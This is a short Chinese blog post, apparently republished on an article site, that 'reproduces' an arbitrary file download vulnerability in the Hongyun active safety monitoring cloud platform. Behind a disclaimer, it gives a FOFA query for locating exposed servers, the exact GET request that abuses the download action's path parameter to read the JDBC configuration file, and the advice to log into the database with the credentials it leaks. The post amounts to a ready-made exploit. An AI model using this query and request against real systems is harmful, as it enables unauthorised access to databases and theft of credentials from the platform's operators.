本文主要是介绍漏洞复现--鸿运主动安全监控云平台任意文件下载,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
免责声明:
**文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行
**
一:漏洞描述
深圳市强鸿电子有限公司鸿运主动安全监控云平台存在任意文件下载漏洞,攻击者可通过此漏洞获得登录账号密码,以进行后续测试。
二:漏洞影响版本
鸿运主动安全监控云平台
三:网络空间测绘查询
fofa:
body="./open/webApi.html"
四:漏洞复现
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties
五:漏洞利用
读取到数据库账号密码,直接连接
这篇关于漏洞复现--鸿运主动安全监控云平台任意文件下载的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!